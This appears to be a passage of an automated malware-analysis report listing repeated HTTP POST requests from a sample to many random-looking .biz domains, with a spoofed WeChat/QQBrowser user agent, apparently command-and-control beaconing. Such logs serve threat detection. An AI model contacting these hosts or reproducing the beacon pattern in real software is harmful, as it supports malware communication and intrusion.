                    Source: global trafficHTTP traffic detected: POST /epvislkuanodp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /ceginiuaduqvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /csle HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /yqjfubvmytgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gyfeenvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /asrbrcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /doycjbriulf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cbqytxty HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xrepjfbt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bbhgohbwpwg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /coprggngfj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /noknucojhesrodhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /pjqqch HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /saqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xyuwwggfo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kywuwrijhguqpyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pjybylbfofdj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /idasaqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sycehlfxifni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /umftqsqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jisysli HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lxkilbbex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /xtwpytxmpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vxagkgmfv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hyoldlagxghmkub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /iipwcgamik HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xubhw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mvx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fmngqrfquhhkif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vblbtbbfmivxyja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gsvxqic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /aisrtinfavo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jfcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /soxbjfwpcadsyans HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wsppsfoumisskbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rbpfcskrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /bnhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /srhcrhfsmrpwwl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xjaepin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /obyashlqvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pwpdijlf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /msvrffxklscfuxyf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gvqfad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /njcuuhovhvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /llwod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /rxjmtw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ptgfiwe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /jabraqcqvewg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ipko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jowqmtxqicfl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /nfkpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fkgxppcjxls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ayxmva HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /eoxlhmklnxbyibsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /clakqqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /wlytwhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /nnuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
